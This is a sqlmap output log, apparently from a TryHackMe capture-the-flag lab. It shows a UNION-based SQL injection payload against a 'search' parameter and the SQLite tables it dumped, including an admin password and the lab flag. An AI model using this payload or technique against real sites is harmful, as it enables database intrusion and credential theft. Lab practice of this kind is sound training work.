        ___
       __H__
 ___ ___[(]_____ ___ ___  {1.4.11#stable}
|_ -| . ["]     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:23:28 /2021-03-02/

[12:23:28] [INFO] parsing HTTP request from 'session_request'
[12:23:28] [INFO] loading tamper module 'space2comment'
[12:23:28] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (GET)
    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: search=James' UNION ALL SELECT NULL,'qvvjq'||'ANRhaKhXgFqEaGzzauEUVPVeSYarOuvLLtpZvngL'||'qqzbq'-- AxrS
---
[12:23:29] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[12:23:29] [INFO] testing SQLite
[12:23:29] [INFO] confirming SQLite
[12:23:29] [INFO] actively fingerprinting SQLite
[12:23:29] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite
[12:23:29] [INFO] fetching tables for database: 'SQLite_masterdb'
[12:23:29] [INFO] fetching columns for table 'sequels' in database 'SQLite_masterdb'
[12:23:29] [INFO] fetching entries for table 'sequels' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: sequels
[22 entries]
+-------------+-----+----------------------------+
| kid         | age | title                      |
+-------------+-----+----------------------------+
| James       | 8   | shoes                      |
| John        | 4   | skateboard                 |
| Robert      | 17  | iphone                     |
| Michael     | 5   | playstation                |
| William     | 6   | xbox                       |
| David       | 6   | candy                      |
| Richard     | 9   | books                      |
| Joseph      | 7   | socks                      |
| Thomas      | 10  | 10 McDonalds meals         |
| Charles     | 3   | toy car                    |
| Christopher | 8   | air hockey table           |
| Daniel      | 12  | lego star wars             |
| Matthew     | 15  | bike                       |
| Anthony     | 3   | table tennis               |
| Donald      | 4   | fazer chocolate            |
| Mark        | 17  | wii                        |
| Paul        | 9   | github ownership           |
| James       | 8   | finnish-english dictionary |
| Steven      | 11  | laptop                     |
| Andrew      | 16  | rasberry pie               |
| Kenneth     | 19  | TryHackMe Sub              |
| Joshua      | 12  | chair                      |
+-------------+-----+----------------------------+

[12:23:30] [INFO] table 'SQLite_masterdb.sequels' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.171.76/dump/SQLite_masterdb/sequels.csv'
[12:23:30] [INFO] fetching columns for table 'users' in database 'SQLite_masterdb'
[12:23:30] [INFO] fetching entries for table 'users' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: users
[1 entry]
+------------------+----------+
| password         | username |
+------------------+----------+
| EhCNSWzzFP6sc7gB | admin    |
+------------------+----------+

[12:23:30] [INFO] table 'SQLite_masterdb.users' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.171.76/dump/SQLite_masterdb/users.csv'
[12:23:30] [INFO] fetching columns for table 'hidden_table' in database 'SQLite_masterdb'
[12:23:30] [INFO] fetching entries for table 'hidden_table' in database 'SQLite_masterdb'
Database: SQLite_masterdb
Table: hidden_table
[1 entry]
+-----------------------------------------+
| flag                                    |
+-----------------------------------------+
| thmfox{All_I_Want_for_Christmas_Is_You} |
+-----------------------------------------+

[12:23:30] [INFO] table 'SQLite_masterdb.hidden_table' dumped to CSV file '/home/kali/.local/share/sqlmap/output/10.10.171.76/dump/SQLite_masterdb/hidden_table.csv'
[12:23:30] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.10.171.76'

[*] ending @ 12:23:30 /2021-03-02/

